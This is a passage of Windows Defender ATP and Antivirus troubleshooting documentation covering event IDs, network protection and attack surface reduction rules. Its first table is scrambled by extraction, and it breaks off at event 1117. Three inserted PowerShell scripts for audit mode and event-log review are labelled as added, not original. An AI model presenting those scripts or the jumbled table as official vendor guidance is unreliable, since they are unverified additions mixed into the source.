Message: Windows Defender Advanced Threat Protection A module is about to exceed its quota. Module: %1, Quota: {%2} {%3},
Description: The machine has almost used its allocated quota of the current 24-hour window. It’s about to be throttled.
Action: Normal operating notification; no action required.
Percentage of quota
utilization: %4.

38 Network connection is The machine is using a Normal operating


identified as low. Windows metered/paid network and notification; no action
Defender Advanced Threat will be contacting the server required.
Protection will contact the less frequently.
server every %1 minutes.
Metered connection: %2,
internet available: %3, free
network available: %4.
39 Network connection is The machine is not using a Normal operating
identified as normal. metered/paid connection notification; no action
Windows Defender and will contact the server required.
Advanced Threat Protection as usual.
will contact the server every
%1 minutes. Metered
connection: %2, internet
available: %3, free network
available: %4.

40 Battery state is identified as The machine has low battery Normal operating
low. Windows Defender level and will contact the notification; no action
Advanced Threat Protection server less frequently. required.
will contact the server every
%1 minutes. Battery state:
%2.

41 Battery state is identified as The machine doesn’t have Normal operating


normal. Windows Defender low battery level and will notification; no action
Advanced Threat Protection contact the server as usual. required.
will contact the server every
%1 minutes. Battery state:
%2.

42 Windows Defender Internal error. The service If this error persists, contact
Advanced Threat Protection failed to start. Support.
WDATP component failed to
perform action. Component:
%1, Action: %2, Exception
Type: %3, Exception
message: %4

43 Windows Defender Internal error. The service If this error persists, contact
Advanced Threat Protection failed to start. Support.
WDATP component failed to
perform action. Component:
%1, Action: %2, Exception
Type: %3, Exception Error:
%4, Exception message: %5

44 Offboarding of Windows The service was offboarded. Normal operating


Defender Advanced Threat notification; no action
Protection service required.
completed.

45 Failed to register and to An error occurred on service If this error persists, contact
start the event trace session startup while creating ETW Support.
[%1]. Error code: %2 session. This caused service
start-up failure.

46 Failed to register and start An error occurred on service Normal operating


the event trace session [%1] startup while creating ETW notification; no action
due to lack of resources. session due to lack of required. The service will try
Error code: %2. This is most resources. The service to start the session every
likely because there are too started and is running, but minute.
many active event trace will not report any sensor
sessions. The service will event until the ETW session
retry in 1 minute. is started.
47 Successfully registered and This event follows the Normal operating
started the event trace previous event after notification; no action
session - recovered after successfully starting of the required.
previous failed attempts. ETW session.

48 Failed to add a provider [%1] Failed to add a provider to Check the error code. If the
to event trace session [%2]. ETW session. As a result, the error persists contact
Error code: %3. This means provider events aren’t Support.
that events from this reported.
provider will not be
reported.

Want to experience Windows Defender ATP? Sign up for a free trial.

Related topics
Onboard Windows 10 machines
Configure machine proxy and Internet connectivity settings
Troubleshoot Windows Defender ATP
Troubleshoot service issues
4/22/2019 • 2 minutes to read

This section addresses issues that might arise as you use the Windows Defender Advanced Threat Protection service.

Server error - Access is denied due to invalid credentials


If you encounter a server error when trying to access the service, you’ll need to change your browser cookie
settings. Configure your browser to allow cookies.

Elements or data missing on the portal


If some UI elements or data are missing on Windows Defender Security Center, it's possible that proxy settings are
blocking them.
Make sure that *.securitycenter.windows.com is included in the proxy whitelist.

NOTE
You must use the HTTPS protocol when adding the following endpoints.

Windows Defender ATP service shows event or error logs in the Event Viewer
See the topic Review events and errors using Event Viewer for a list of event IDs that are reported by the Windows
Defender ATP service. The topic also contains troubleshooting steps for event errors.

Windows Defender ATP service fails to start after a reboot and shows error 577
If onboarding machines successfully completes but Windows Defender ATP does not start after a reboot and
shows error 577, check that Windows Defender is not disabled by a policy.
For more information, see Ensure that Windows Defender Antivirus is not disabled by policy.

Known issues with regional formats


Date and time formats
There are some known issues with the time and date formats.
The following date formats are supported:
MM/dd/yyyy
dd/MM/yyyy
The following date and time formats are currently not supported:
Date format yyyy/MM/dd
Date format dd/MM/yy
Date format with yy. Will only show yyyy.
Time format HH:mm:ss is not supported (the 12 hour AM/PM format is not supported). Only the 24-hour
format is supported.
Use of comma to indicate thousand
Using a comma as a thousands separator in numbers is not supported. Regions where a number is separated with
a comma to indicate a thousand will only see a dot used as the separator. For example, 15,5K is displayed as
15.5K.


Windows Defender ATP tenant was automatically created in Europe


When you use Azure Security Center to monitor servers, a Windows Defender ATP tenant is automatically created.
The Windows Defender ATP data is stored in Europe by default.

Related topics
Troubleshoot Windows Defender Advanced Threat Protection onboarding issues
Review events and errors using Event Viewer
Check the Windows Defender Advanced Threat Protection service health
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)


The Service health provides information on the current status of the Windows Defender ATP service. You'll be
able to verify that the service health is healthy or if there are current issues. If there are issues, you'll see details
related to the issue such as when the issue was detected, what the preliminary root cause is, and the expected
resolution time.
You'll also see information on historical issues that have been resolved and details such as the date and time when
the issue was resolved. When there are no issues on the service, you'll see a healthy status.
You can view details on the service health by clicking the tile from the Security operations dashboard or
selecting the Service health menu from the navigation pane.
The Service health details page has the following tabs:
Current status
Status history

Current status
The Current status tab shows the current state of the Windows Defender ATP service. When the service is
running smoothly a healthy service health is shown. If there are issues seen, the following service details are
shown to help you gain better insight about the issue:
Date and time for when the issue was detected
A short description of the issue
Update time
Summary of impact
Preliminary root cause
Next steps
Expected resolution time
Updates on the progress of an issue are reflected on the page as the issue gets resolved. You'll see updates on
information such as an updated estimated resolution time or next steps.
When an issue is resolved, it gets recorded in the Status history tab.

Status history
The Status history tab reflects all the historical issues that were seen and resolved. You'll see details of the
resolved issues along with the other information that was included while each issue was being resolved.
Related topic
View the Security operations dashboard
Troubleshoot network protection
4/29/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
IT administrators
When you use Network protection you may encounter issues, such as:
Network protection blocks a website that is safe (false positive)
Network protection fails to block a suspicious or known malicious website (false negative)
There are four steps to troubleshooting these problems:
1. Confirm prerequisites
2. Use audit mode to test the rule
3. Add exclusions for the specified rule (for false positives)
4. Submit support logs

Confirm prerequisites
Network protection will only work on devices with the following conditions:
Endpoints are running Windows 10 Enterprise edition, version 1709 or higher (also known as the Fall Creators
Update).
Endpoints are using Windows Defender Antivirus as the sole antivirus protection app. Using any other
antivirus app will cause Windows Defender AV to disable itself.
Real-time protection is enabled.
Cloud-delivered protection is enabled.
Audit mode is not enabled. Use Group Policy to set the rule to Disabled (value: 0).

Use audit mode


You can enable network protection in audit mode and then visit a website that we've created to demo the feature.
All website connections will be allowed by network protection but an event will be logged to indicate any
connection that would have been blocked if network protection was enabled.
1. Set network protection to Audit mode:
Set-MpPreference -EnableNetworkProtection AuditMode
2. Perform the connection activity that is causing an issue (for example, attempt to visit the site, or connect to the
IP address you do or don't want to block).
3. Review the network protection event logs to see if the feature would have blocked the connection if it had been
set to Enabled.

If network protection is not blocking a connection that you are expecting it should block, enable the feature:

Set-MpPreference -EnableNetworkProtection Enabled
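The audit-mode procedure above as a script, added here as an example (it is not code from the original topic): it switches network protection to audit mode, verifies the setting took effect, and then lists the audit events that show which connections would have been blocked. The log name Microsoft-Windows-Windows Defender/Operational and the event IDs 1125 (audit-mode hit) and 1126 (block) are known Windows Defender values that this topic does not itself list.

```powershell
# Added example, not code from the original topic. Assumes the Windows Defender PowerShell
# module (Get-MpPreference / Set-MpPreference) on an elevated prompt, plus Get-WinEvent.
# Known Defender values used here, not taken from this topic:
#   log  : Microsoft-Windows-Windows Defender/Operational
#   1125 : network protection would have blocked the connection (audit mode)
#   1126 : network protection blocked the connection (enabled mode)

function Enable-NetworkProtectionAudit {
    Set-MpPreference -EnableNetworkProtection AuditMode
    # Get-MpPreference reports the setting numerically: 0 = Disabled, 1 = Enabled, 2 = AuditMode
    $state = [int](Get-MpPreference).EnableNetworkProtection
    if ($state -ne 2) {
        throw "Network protection is not in audit mode (EnableNetworkProtection = $state)"
    }
    $state
}

function Get-NetworkProtectionEvents {
    param(
        [datetime] $Since = (Get-Date).AddHours(-1),   # only look at the test window
        [switch]   $IncludeBlocks                       # also list real blocks (1126)
    )
    $ids = @(1125)
    if ($IncludeBlocks) { $ids += 1126 }
    $filter = @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = $ids
        StartTime = $Since
    }
    $modeName = @{ 1125 = 'Audit'; 1126 = 'Block' }
    # Get-WinEvent raises an error when nothing matches; treat that as "no events"
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        [pscustomobject]@{
            Time    = $_.TimeCreated
            Mode    = $modeName[[int]$_.Id]
            Message = $_.Message   # event text; names the destination that was evaluated
        }
    }
}

# Usage, as three separate runs so the reproduction can happen in between:
#   1. Enable-NetworkProtectionAudit
#   2. reproduce the connection that misbehaves
#   3. Get-NetworkProtectionEvents | Format-Table -AutoSize
# No 1125 event for the connection means the feature would not have blocked it
# in Enabled mode either; that is the false-negative case to report.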

Report a false positive or false negative


If you've tested the feature with the demo site and with audit mode, and network protection is working on pre-
configured scenarios, but is not working as expected for a specific connection, use the Windows Defender Security
Intelligence web-based submission form to report a false negative or false positive for network protection. With an
E5 subscription, you can also provide a link to any associated alert.

Collect diagnostic data for file submissions


When you report a problem with network protection, you are asked to collect and submit diagnostic data that can
be used by Microsoft support and engineering teams to help troubleshoot issues.
1. Open an elevated command prompt and change to the Windows Defender directory:
cd c:\program files\windows defender
2. Run this command to generate the diagnostic logs:
mpcmdrun -getfiles
3. By default, they are saved to C:\ProgramData\Microsoft\Windows Defender\Support\MpSupportFiles.cab.
Attach the file to the submission form.

Related topics
Windows Defender Exploit Guard
Network protection
Evaluate network protection
Enable network protection
Troubleshoot attack surface reduction rules
4/8/2019 • 3 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
When you use attack surface reduction rules you may encounter issues, such as:
A rule blocks a file, process, or performs some other action that it should not (false positive)
A rule does not work as described, or does not block a file or process that it should (false negative)
There are four steps to troubleshooting these problems:
1. Confirm prerequisites
2. Use audit mode to test the rule
3. Add exclusions for the specified rule (for false positives)
4. Submit support logs

Confirm prerequisites
Attack surface reduction rules will only work on devices with the following conditions:
Endpoints are running Windows 10 Enterprise, version 1709 (also known as the Fall Creators Update).
Endpoints are using Windows Defender Antivirus as the sole antivirus protection app. Using any other antivirus
app will cause Windows Defender AV to disable itself.
Real-time protection is enabled.
Audit mode is not enabled. Use Group Policy to set the rule to Disabled (value: 0) as described in Enable attack
surface reduction rules.
If these prerequisites have all been met, proceed to the next step to test the rule in audit mode.

Use audit mode to test the rule


You can visit the Windows Defender Testground website at demo.wd.microsoft.com to confirm attack surface
reduction rules are generally working for pre-configured scenarios and processes on a device, or you can use audit
mode, which enables rules for reporting only.
Follow these instructions in Use the demo tool to see how attack surface reduction rules work to test the specific
rule you are encountering problems with.
1. Enable audit mode for the specific rule you want to test. Use Group Policy to set the rule to Audit mode (value:
2) as described in Enable attack surface reduction rules. Audit mode allows the rule to report the file or process,
but will still allow it to run.
2. Perform the activity that is causing an issue (for example, open or execute the file or process that should be
blocked but is being allowed).
3. Review the attack surface reduction rule event logs to see if the rule would have blocked the file or process if the
rule had been set to Enabled.

If a rule is not blocking a file or process that you are expecting it should block, first check if audit mode is
enabled.
Audit mode may have been enabled for testing another feature, or by an automated PowerShell script, and
may not have been disabled after the tests were completed.

If you've tested the rule with the demo tool and with audit mode, and attack surface reduction rules are working on
pre-configured scenarios, but the rule is not working as expected, proceed to either of the following sections based
on your situation:
1. If the attack surface reduction rule is blocking something that it should not block (also known as a false
positive), you can first add an attack surface reduction rule exclusion.
2. If the attack surface reduction rule is not blocking something that it should block (also known as a false
negative), you can proceed immediately to the last step, collecting diagnostic data and submitting the issue to
us.
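The prerequisite and audit-mode checks above as a script, added here as an example (it is not code from the original topic): it reports whether the build, antivirus and real-time protection conditions hold, lists every rule's current mode so a rule left in audit mode from an earlier test is visible, and sets one rule to audit mode for the test. Assumptions: Windows 10 version 1709 is build 16299; Get-MpPreference exposes rule GUIDs and modes as the parallel arrays AttackSurfaceReductionRules_Ids and AttackSurfaceReductionRules_Actions, with the same 0 = Disabled and 2 = Audit values the topic gives for Group Policy plus 1 = Block; the rule GUID passed in is a placeholder you replace with the rule under test.

```powershell
# Added example, not code from the original topic. Assumes the Windows Defender PowerShell
# module on an elevated prompt. Assumptions: build 16299 = Windows 10 version 1709;
# AttackSurfaceReductionRules_Ids / _Actions are parallel arrays on Get-MpPreference;
# action codes 0 = Disabled, 1 = Block, 2 = Audit (0 and 2 match the policy values in the topic).

$AsrActionNames = @{ 0 = 'Disabled'; 1 = 'Block'; 2 = 'Audit' }

function Get-AsrRuleState {
    # One object per configured rule: GUID plus the mode it is currently in.
    $pref = Get-MpPreference
    $ids  = @($pref.AttackSurfaceReductionRules_Ids)
    $acts = @($pref.AttackSurfaceReductionRules_Actions)
    for ($i = 0; $i -lt $ids.Count; $i++) {
        $code = [int]$acts[$i]
        $name = $AsrActionNames[$code]
        if (-not $name) { $name = "Unknown($code)" }
        [pscustomobject]@{ RuleId = $ids[$i]; Action = $name }
    }
}

function Test-AsrPrerequisites {
    # Mirrors the "Confirm prerequisites" list: build, sole-AV, real-time, no leftover audit mode.
    $status = Get-MpComputerStatus
    $build  = [int](Get-CimInstance Win32_OperatingSystem).BuildNumber
    $audit  = @(Get-AsrRuleState | Where-Object Action -eq 'Audit')
    [pscustomobject]@{
        OsBuildOk            = ($build -ge 16299)
        AntivirusEnabled     = [bool]$status.AntivirusEnabled       # false once another AV makes Defender disable itself
        RealTimeProtectionOn = [bool]$status.RealTimeProtectionEnabled
        RulesInAuditMode     = $audit.Count                          # should be 0 before a block-mode test
        AuditRuleIds         = ($audit.RuleId -join ', ')
    }
}

function Set-AsrRuleMode {
    param(
        # Placeholder: the GUID of the rule under test (from the Attack surface reduction rules topic)
        [Parameter(Mandatory)] [string] $RuleId,
        [Parameter(Mandatory)] [ValidateSet('Disabled', 'Enabled', 'AuditMode')] [string] $Mode
    )
    # Set-MpPreference takes the rule GUID and its mode as paired arrays, like the policy setting.
    Set-MpPreference -AttackSurfaceReductionRules_Ids $RuleId -AttackSurfaceReductionRules_Actions $Mode
    Get-AsrRuleState | Where-Object RuleId -eq $RuleId
}

# Usage:
#   Test-AsrPrerequisites                                   # all true and RulesInAuditMode = 0
#   Set-AsrRuleMode -RuleId '<rule GUID>' -Mode AuditMode   # step 1 of the audit test
#   ... open or run the file or process in question ...
#   Set-AsrRuleMode -RuleId '<rule GUID>' -Mode Enabled     # restore block mode after the test
```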

Add exclusions for a false positive


If the attack surface reduction rule is blocking something that it should not block (also known as a false positive),
you can add exclusions to prevent attack surface reduction rules from evaluating the excluded files or folders.
To add an exclusion, see Customize Attack surface reduction.

IMPORTANT
You can specify individual files and folders to be excluded, but you cannot specify individual rules. This means any files or
folders that are excluded will be excluded from all ASR rules.

Report a false positive or false negative


Use the Windows Defender Security Intelligence web-based submission form to report a false negative or false
positive for network protection. With an E5 subscription, you can also provide a link to any associated alert.

Collect diagnostic data for file submissions


When you report a problem with attack surface reduction rules, you are asked to collect and submit diagnostic data
that can be used by Microsoft support and engineering teams to help troubleshoot issues.
1. Open an elevated command prompt and change to the Windows Defender directory:
cd c:\program files\windows defender
2. Run this command to generate the diagnostic logs:
mpcmdrun -getfiles
3. By default, they are saved to C:\ProgramData\Microsoft\Windows Defender\Support\MpSupportFiles.cab.
Attach the file to the submission form.

Related topics
Attack surface reduction rules
Enable attack surface reduction rules
Evaluate attack surface reduction rules
Review event logs and error codes to troubleshoot issues with Windows Defender Antivirus
4/5/2019 • 34 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
If you encounter a problem with Windows Defender Antivirus, you can search the tables in this topic to find a
matching issue and potential solution.
The tables list:
Windows Defender Antivirus event IDs (these apply to both Windows 10 and Windows Server 2016)
Windows Defender Antivirus client error codes
Internal Windows Defender Antivirus client error codes (used by Microsoft during development and testing)

TIP
You can also visit the Windows Defender ATP demo website at demo.wd.microsoft.com to confirm the following features
are working:
Cloud-delivered protection
Fast learning (including Block at first sight)
Potentially unwanted application blocking

Windows Defender Antivirus event IDs


Windows Defender Antivirus records event IDs in the Windows event log.
You can directly view the event log, or if you have a third-party security information and event management
(SIEM) tool, you can also consume Windows Defender Antivirus client event IDs to review specific events and
errors from your endpoints.
The table in this section lists the main Windows Defender Antivirus event IDs and, where possible, provides
suggested solutions to fix or resolve the error.
To view a Windows Defender Antivirus event
1. Open Event Viewer.
2. In the console tree, expand Applications and Services Logs, then Microsoft, then Windows, then
Windows Defender Antivirus.
3. Double-click on Operational.
4. In the details pane, view the list of individual events to find your event.
5. Click the event to see specific details about an event in the lower pane, under the General and Details tabs.
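The same review done from PowerShell instead of Event Viewer, added here as an example (it is not code from the original topic): it reads the detection, action and scan-failure events listed in the table below, parses the "Label: value" fields the table documents out of each event's text, and pairs every detection with the action taken (or the failed action's error code). Assumed: the Operational log opened in the steps above is named Microsoft-Windows-Windows Defender/Operational.

```powershell
# Added example, not code from the original topic. Assumes the log name
# 'Microsoft-Windows-Windows Defender/Operational' and the "Label: value" event text
# documented in the table that follows (Name, Severity, Path, Action, Error Code, User).

function ConvertFrom-AvEventMessage {
    param([Parameter(Mandatory)] $Record)   # one System.Diagnostics.Eventing.Reader.EventLogRecord
    # Pull one documented field out of the event text; $null when the event has no such line.
    $get = {
        param([string] $Label)
        if ($Record.Message -match "(?m)^\s*$Label\s*:\s*(.+?)\s*$") { $Matches[1] } else { $null }
    }
    [pscustomobject]@{
        Time       = $Record.TimeCreated
        Id         = $Record.Id
        ThreatName = & $get 'Name'
        Severity   = & $get 'Severity'
        Path       = & $get 'Path'
        Action     = & $get 'Action'
        ErrorCode  = & $get 'Error Code'   # HRESULT text on 1005 / 1008
        User       = & $get 'User'
    }
}

function Get-DefenderAvEvents {
    param(
        [datetime] $Since = (Get-Date).AddDays(-1),
        # 1005 scan failed, 1006 malware detected, 1007 action taken,
        # 1008 action failed, 1015 suspicious behavior (all from the table below)
        [int[]]    $Ids   = @(1005, 1006, 1007, 1008, 1015)
    )
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = $Ids
        StartTime = $Since
    } -ErrorAction SilentlyContinue | ForEach-Object { ConvertFrom-AvEventMessage -Record $_ }
}

function Get-DetectionOutcomes {
    # For each detection, say whether a 1007 (action taken) exists for the same threat name,
    # and surface the 1008 error code when the action failed instead.
    param([datetime] $Since = (Get-Date).AddDays(-1))
    $events   = @(Get-DefenderAvEvents -Since $Since)
    $detected = $events | Where-Object { $_.Id -in 1006, 1015 }
    $actioned = @($events | Where-Object { $_.Id -eq 1007 } | ForEach-Object { $_.ThreatName })
    $failed   = @($events | Where-Object { $_.Id -eq 1008 })
    foreach ($d in $detected) {
        $fail = $failed | Where-Object { $_.ThreatName -eq $d.ThreatName } | Select-Object -First 1
        [pscustomobject]@{
            Time        = $d.Time
            ThreatName  = $d.ThreatName
            Severity    = $d.Severity
            Path        = $d.Path
            ActionTaken = ($actioned -contains $d.ThreatName)
            FailedCode  = if ($fail) { $fail.ErrorCode } else { $null }
        }
    }
}

# Usage:
#   Get-DetectionOutcomes | Format-Table -AutoSize          # detections without ActionTaken need follow-up
#   Get-DefenderAvEvents -Ids 1005 | Select-Object Time, ErrorCode   # scan failures to look up
```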

EVENT ID: 1000

Symbolic name: MALWAREPROTECTION_SCAN_STARTED


Message: An antimalware scan started.

Description:
Scan ID: <ID number of the relevant scan.>
Scan Type: <Scan type>, for example:
Antivirus
Antispyware
Antimalware
Scan Parameters: <Scan parameters>, for example:
Full scan
Quick scan
Customer scan
Scan Resources: <Resources (such as files/directories/BHO) that were scanned.>
User: <Domain>\<User>

EVENT ID: 1001

Symbolic name: MALWAREPROTECTION_SCAN_COMPLETED

Message: An antimalware scan finished.

Description:
Scan ID: <ID number of the relevant scan.>
Scan Type: <Scan type>, for example:
Antivirus
Antispyware
Antimalware
Scan Parameters: <Scan parameters>, for example:
Full scan
Quick scan
Customer scan
User: <Domain>\<User>
Scan Time: <The duration of a scan.>

EVENT ID: 1002

Symbolic name: MALWAREPROTECTION_SCAN_CANCELLED

Message: An antimalware scan was stopped before it finished.

Description:
Scan ID: <ID number of the relevant scan.>
Scan Type: <Scan type>, for example:
Antivirus
Antispyware
Antimalware
Scan Parameters: <Scan parameters>, for example:
Full scan
Quick scan
Customer scan
User: <Domain>\<User>
Scan Time: <The duration of a scan.>

EVENT ID: 1003

Symbolic name: MALWAREPROTECTION_SCAN_PAUSED

Message: An antimalware scan was paused.

Description:
Scan ID: <ID number of the relevant scan.>
Scan Type: <Scan type>, for example:
Antivirus
Antispyware
Antimalware
Scan Parameters: <Scan parameters>, for example:
Full scan
Quick scan
Customer scan
User: <Domain>\<User>

EVENT ID: 1004

Symbolic name: MALWAREPROTECTION_SCAN_RESUMED


Message: An antimalware scan was resumed.

Description:
Scan ID: <ID number of the relevant scan.>
Scan Type: <Scan type>, for example:
Antivirus
Antispyware
Antimalware
Scan Parameters: <Scan parameters>, for example:
Full scan
Quick scan
Customer scan
User: <Domain>\<User>

EVENT ID: 1005

Symbolic name: MALWAREPROTECTION_SCAN_FAILED

Message: An antimalware scan failed.

Description:
Scan ID: <ID number of the relevant scan.>
Scan Type: <Scan type>, for example:
Antivirus
Antispyware
Antimalware
Scan Parameters: <Scan parameters>, for example:
Full scan
Quick scan
Customer scan
User: <Domain>\<User>
Error Code: <Error code> Result code associated with threat status. Standard HRESULT values.
Error Description: <Error description> Description of the error.

User action: The antivirus client encountered an error, and the current scan has stopped. The scan might fail due to a
client-side issue. This event record includes the scan ID, type of scan (Windows Defender Antivirus, antispyware,
antimalware), scan parameters, the user that started the scan, the error code, and a description of the error. To
troubleshoot this event:
1. Run the scan again.
2. If it fails in the same way, go to the Microsoft Support site, enter the error number in the Search box to look
for the error code.
3. Contact Microsoft Technical Support.

EVENT ID: 1006

Symbolic name: MALWAREPROTECTION_MALWARE_DETECTED

Message: The antimalware engine found malware or other potentially unwanted software.

Description: For more information please see the following:
Name: <Threat name>
ID: <Threat ID>
Severity: <Severity>, for example:
Low
Moderate
High
Severe
Category: <Category description>, for example, any threat or malware type.
Path: <File path>
Detection Origin: <Detection origin>, for example:
Unknown
Local computer
Network share
Internet
Incoming traffic
Outgoing traffic
Detection Type: <Detection type>, for example:
Heuristics
Generic
Concrete
Dynamic signature
Detection Source: <Detection source> for example:
User: user initiated
System: system initiated
Real-time: real-time component initiated
IOAV: IE Downloads and Outlook Express Attachments initiated
NIS: Network inspection system
IEPROTECT: IE - IExtensionValidation; this protects against malicious webpage controls
Early Launch Antimalware (ELAM). This includes malware detected by the boot sequence
Remote attestation
Antimalware Scan Interface (AMSI). Primarily used to protect scripts (PS, VBS), though it can be invoked by third parties as well.
UAC
Status: <Status>
User: <Domain>\<User>
Process Name: <Process in the PID>
Signature Version: <Definition version>
Engine Version: <Antimalware Engine version>

EVENT ID: 1007

Symbolic name: MALWAREPROTECTION_MALWARE_ACTION_TAKEN

Message: The antimalware platform performed an action to protect your system from malware or other potentially
unwanted software.

Description: Windows Defender Antivirus has taken action to protect this machine from malware or other potentially
unwanted software. For more information please see the following:
User: <Domain>\<User>
Name: <Threat name>
ID: <Threat ID>
Severity: <Severity>, for example:
Low
Moderate
High
Severe
Category: <Category description>, for example, any threat or malware type.
Action: <Action>, for example:
Clean: The resource was cleaned
Quarantine: The resource was quarantined
Remove: The resource was deleted
Allow: The resource was allowed to execute/exist
User defined: User defined action which is normally one from this list of actions that the user has specified
No action: No action
Block: The resource was blocked from executing
Status: <Status>
Signature Version: <Definition version>
Engine Version: <Antimalware Engine version>

EVENT ID: 1008

Symbolic name: MALWAREPROTECTION_MALWARE_ACTION_FAILED

Message: The antimalware platform attempted to perform an action to protect your system from malware or other
potentially unwanted software, but the action failed.

Description: Windows Defender Antivirus has encountered an error when taking action on malware or other potentially
unwanted software. For more information please see the following:
User: <Domain>\<User>
Name: <Threat name>
ID: <Threat ID>
Severity: <Severity>, for example:
Low
Moderate
High
Severe
Category: <Category description>, for example, any threat or malware type.
Path: <File path>
Action: <Action>, for example:
Clean: The resource was cleaned
Quarantine: The resource was quarantined
Remove: The resource was deleted
Allow: The resource was allowed to execute/exist
User defined: User defined action which is normally one from this list of actions that the user has specified
No action: No action
Block: The resource was blocked from executing
Error Code: <Error code> Result code associated with threat status. Standard HRESULT values.
Error Description: <Error description> Description of the error.
Status: <Status>
Signature Version: <Definition version>
Engine Version: <Antimalware Engine version>

EVENT ID: 1009

Symbolic name: MALWAREPROTECTION_QUARANTINE_RESTORE

Message: The antimalware platform restored an item from quarantine.

Description: Windows Defender Antivirus has restored an item from quarantine. For more information please see the
following:
Name: <Threat name>
ID: <Threat ID>
Severity: <Severity>, for example:
Low
Moderate
High
Severe
Category: <Category description>, for example, any threat or malware type.
Path: <File path>
User: <Domain>\<User>
Signature Version: <Definition version>
Engine Version: <Antimalware Engine version>

EVENT ID: 1010


Symbolic name: MALWAREPROTECTION_QUARANTINE_RESTORE_FAILED

Message: The antimalware platform could not restore an item from quarantine.

Description: Windows Defender Antivirus has encountered an error trying to restore an item from quarantine. For more
information please see the following:
Name: <Threat name>
ID: <Threat ID>
Severity: <Severity>, for example:
Low
Moderate
High
Severe
Category: <Category description>, for example, any threat or malware type.
Path: <File path>
User: <Domain>\<User>
Error Code: <Error code> Result code associated with threat status. Standard HRESULT values.
Error Description: <Error description> Description of the error.
Signature Version: <Definition version>
Engine Version: <Antimalware Engine version>

EVENT ID: 1011

Symbolic name: MALWAREPROTECTION_QUARANTINE_DELETE

Message: The antimalware platform deleted an item from quarantine.

Description: Windows Defender Antivirus has deleted an item from quarantine. For more information please see the
following:
Name: <Threat name>
ID: <Threat ID>
Severity: <Severity>, for example:
Low
Moderate
High
Severe
Category: <Category description>, for example, any threat or malware type.
Path: <File path>
User: <Domain>\<User>
Signature Version: <Definition version>
Engine Version: <Antimalware Engine version>

EVENT ID: 1012

Symbolic name: MALWAREPROTECTION_QUARANTINE_DELETE_FAILED

Message: The antimalware platform could not delete an item from quarantine.

Description: Windows Defender Antivirus has encountered an error trying to delete an item from quarantine. For more
information please see the following:
Name: <Threat name>
ID: <Threat ID>
Severity: <Severity>, for example:
Low
Moderate
High
Severe
Category: <Category description>, for example, any threat or malware type.
Path: <File path>
User: <Domain>\<User>
Error Code: <Error code> Result code associated with threat status. Standard HRESULT values.
Error Description: <Error description> Description of the error.
Signature Version: <Definition version>
Engine Version: <Antimalware Engine version>

EVENT ID: 1013

Symbolic name: MALWAREPROTECTION_MALWARE_HISTORY_DELETE

Message: The antimalware platform deleted history of malware and other potentially unwanted software.

Description: Windows Defender Antivirus has removed history of malware and other potentially unwanted software.
Time: The time when the event occurred, for example when the history is purged. Note that this parameter is not used
in threat events so that there is no confusion regarding whether it is remediation time or infection time. For those,
we specifically call them as Action Time or Detection Time.
User: <Domain>\<User>

EVENT ID: 1014

Symbolic name: MALWAREPROTECTION_MALWARE_HISTORY_DELETE_FAILED

Message: The antimalware platform could not delete history of malware and other potentially unwanted software.

Description: Windows Defender Antivirus has encountered an error trying to remove history of malware and other
potentially unwanted software.
Time: The time when the event occurred, for example when the history is purged. Note that this parameter is not used
in threat events so that there is no confusion regarding whether it is remediation time or infection time. For those,
we specifically call them as Action Time or Detection Time.
User: <Domain>\<User>
Error Code: <Error code> Result code associated with threat status. Standard HRESULT values.
Error Description: <Error description> Description of the error.

EVENT ID: 1015

Symbolic name: MALWAREPROTECTION_BEHAVIOR_DETECTED

Message: The antimalware platform detected suspicious behavior.

Description: Windows Defender Antivirus has detected a suspicious behavior. For more information please see the following:
  Name: <Threat name>
  ID: <Threat ID>
  Severity: <Severity>, for example:
    - Low
    - Moderate
    - High
    - Severe
  Category: <Category description>, for example, any threat or malware type.
  Path: <File path>
  Detection Origin: <Detection origin>, for example:
    - Unknown
    - Local computer
    - Network share
    - Internet
    - Incoming traffic
    - Outgoing traffic
  Detection Type: <Detection type>, for example:
    - Heuristics
    - Generic
    - Concrete
    - Dynamic signature
  Detection Source: <Detection source>, for example:
    - User: user initiated
    - System: system initiated
    - Real-time: real-time component initiated
    - IOAV: IE Downloads and Outlook Express Attachments initiated
    - NIS: Network inspection system
    - IEPROTECT: IE - IExtensionValidation; this protects against malicious webpage controls
    - Early Launch Antimalware (ELAM). This includes malware detected by the boot sequence
    - Remote attestation
    - Antimalware Scan Interface (AMSI). Primarily used to protect scripts (PS, VBS), though it can be invoked by third parties as well.
    - UAC
  Status: <Status>
  User: <Domain>\<User>
  Process Name: <Process in the PID>
  Signature ID: Enumeration matching severity.
  Signature Version: <Definition version>
  Engine Version: <Antimalware Engine version>
  Fidelity Label:
  Target File Name: <File name>. Name of the file.

EVENT ID: 1116

Symbolic name: MALWAREPROTECTION_STATE_MALWARE_DETECTED

Message: The antimalware platform detected malware or other potentially unwanted software.

Description: Windows Defender Antivirus has detected malware or other potentially unwanted software. For more information please see the following:
  Name: <Threat name>
  ID: <Threat ID>
  Severity: <Severity>, for example:
    - Low
    - Moderate
    - High
    - Severe
  Category: <Category description>, for example, any threat or malware type.
  Path: <File path>
  Detection Origin: <Detection origin>, for example:
    - Unknown
    - Local computer
    - Network share
    - Internet
    - Incoming traffic
    - Outgoing traffic
  Detection Type: <Detection type>, for example:
    - Heuristics
    - Generic
    - Concrete
    - Dynamic signature
  Detection Source: <Detection source>, for example:
    - User: user initiated
    - System: system initiated
    - Real-time: real-time component initiated
    - IOAV: IE Downloads and Outlook Express Attachments initiated
    - NIS: Network inspection system
    - IEPROTECT: IE - IExtensionValidation; this protects against malicious webpage controls
    - Early Launch Antimalware (ELAM). This includes malware detected by the boot sequence
    - Remote attestation
    - Antimalware Scan Interface (AMSI). Primarily used to protect scripts (PS, VBS), though it can be invoked by third parties as well.
    - UAC
  User: <Domain>\<User>
  Process Name: <Process in the PID>
  Signature Version: <Definition version>
  Engine Version: <Antimalware Engine version>

User action: No action is required. Windows Defender Antivirus can suspend and take routine action on this threat. If you want to remove the threat manually, in the Windows Defender Antivirus interface, click Clean Computer.

EVENT ID: 1117

